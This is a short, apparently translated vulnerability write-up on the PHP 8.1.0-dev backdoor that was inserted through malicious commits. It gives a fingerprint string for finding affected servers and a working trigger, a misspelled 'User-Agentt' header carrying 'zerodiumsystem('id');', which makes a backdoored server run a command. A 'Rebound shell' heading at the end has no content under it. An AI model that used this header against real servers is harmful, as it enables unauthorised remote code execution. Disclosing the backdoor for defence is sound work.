Php Zerodium Backdoor Vulnerability
Php Zerodium Backdoor Vulnerability
PHP zerodium backdoor vulnerability
Vulnerability Description
During the analysis of one of the malicious COMMITs, PHP development engineer Jake Birchall found that the backdoor injected into the code came from a website where PHP code was hijacked and used remote code to execute operations, and the attacker plagiarized the name of the PHP developer to submit the COMMIT.
So far, PHP has not disclosed more about the incident, saying that the specific details of the hacking of the server are still under investigation.
Vulnerability Impact
PHP 8.1.0-dev
Network surveying and mapping
“PHP/8.1.0-dev”
Vulnerability reappears
The backdoor adds a request header (yes User-Agentt, not User-Agent)
User-Agentt: zerodiumsystem('id');
Rebound shell
This post is licensed under CC BY 4.0 by the author.